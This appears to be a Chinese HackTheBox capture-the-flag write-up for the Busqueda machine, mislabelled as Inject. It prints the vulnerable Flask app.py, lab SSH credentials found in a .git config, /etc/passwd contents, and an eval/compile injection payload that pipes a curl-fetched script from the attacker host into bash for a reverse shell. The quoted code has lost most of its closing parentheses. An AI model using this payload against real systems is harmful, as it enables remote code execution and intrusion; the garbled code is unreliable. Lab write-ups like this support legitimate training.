准备:
靶机:Inject,htb网站:https://www.hackthebox.com/,靶机地址:https://app.hackthebox.com/machines/Busqueda。
备注:这个说难也难说简单也是很简单,如果要通过命令执行来进行shell反弹可能会有点难度,但是如果通过发现的密码直接去登录就是比较简单的。
一:信息收集
1.nmap扫描
2.dns解析
二:信息利用
1.bp抓包
2.命令执行
#我们先是传入了一个值给参数query
query = '1'
#然后将我们的参数带入到下面并进行返回
Engine.Google.search(query
#所以在我们传输1'的时候会进行报错,传入1''的时候又会恢复正常3.shell反弹
app.py内容
from flask import Flask, render_template, request, redirect
from searchor import Engine
import subprocess
app = Flask(__name__
@app.route('/'
def index(:
return render_template('index.html', options=Engine.__members__, error=''
@app.route('/search', methods=['POST']
def search(:
try:
engine = request.form.get('engine'
query = request.form.get('query'
auto_redirect = request.form.get('auto_redirect'
if engine in Engine.__members__.keys(:
arg_list = ['searchor', 'search', engine, query]
r = subprocess.run(arg_list, capture_output=True
url = r.stdout.strip(.decode(
if auto_redirect is not None:
return redirect(url, code=302
else:
return url
else:
return render_template('index.html', options=Engine.__members__, error="Invalid engine!"
except Exception as e:
print(e
return render_template('index.html', options=Engine.__members__, error="Something went wrong!"
if __name__ == '__main__':
app.run(debug=False
继续读取.git目录下的内容,在config文件中发现:http://cody:jh2usoih3bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git,发现cody:jh2usoih3bkjaspwe92像是一组账户名,gitea.searcher.htb应该是一个子域名,但是/etc/passwd文件中显示不存在cody账户,存在svn账户,因此使用svc/jh2usoih3bkjaspwe92进行ssh连接,命令:ssh svc@10.10.11.208,成功获得shell权限。
/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin:/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
svc:x:1000:1000:svc:/home/svc:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
fwupd-refresh:x:113:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false后面又想到上面既然有命令执行的漏洞了,没道理反弹不了shell啊,就在网上查找资料发现了subprocess函数,我们可以利用如下格式:eval(complie(“要执行的代码”,“<String>”,“exec”进行shell反弹,exp:1'%2beval(compile('for+x+in+range(1%3a\n+import+os\n+os.system("curl http://10.10.14.50:8000/bash.sh | bash "','a','single'%2b',成功获得shell权限。